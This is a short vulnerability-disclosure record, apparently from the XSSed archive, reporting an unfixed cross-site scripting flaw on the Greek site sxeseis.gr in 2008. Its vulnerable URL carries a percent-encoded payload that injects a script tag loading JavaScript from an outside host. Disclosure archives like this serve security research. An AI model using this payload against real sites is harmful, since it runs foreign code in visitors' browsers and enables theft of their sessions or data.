Unfixed XSS vulnerability at sxeseis.gr

2008-05-25T00:00:00
ID XSSED:39970
Type xssed
Reporter kerzua
Modified 2008-05-27T00:00:00

Description

Security researcher kerzua, has submitted on 25/05/2008 a cross-site-scripting (XSS) vulnerability affecting sxeseis.gr, which at the time of submission ranked 67310 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/05/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://sxeseis.gr/ks_searchmem.php?action=searchbasic&page=%30%26%6D%65%6D%73%73%68%6F%77%3D%33%30%26%73%68%6F%77%3D%3E%22%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%6B%65%72%7A%75%61%2E%66%72%65%65%68%6F%73%74%69%61%2E%63%6F%6D%2F%6B%65%72%7A%75%61%66%75%6C%73%63%72%69%70%74%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E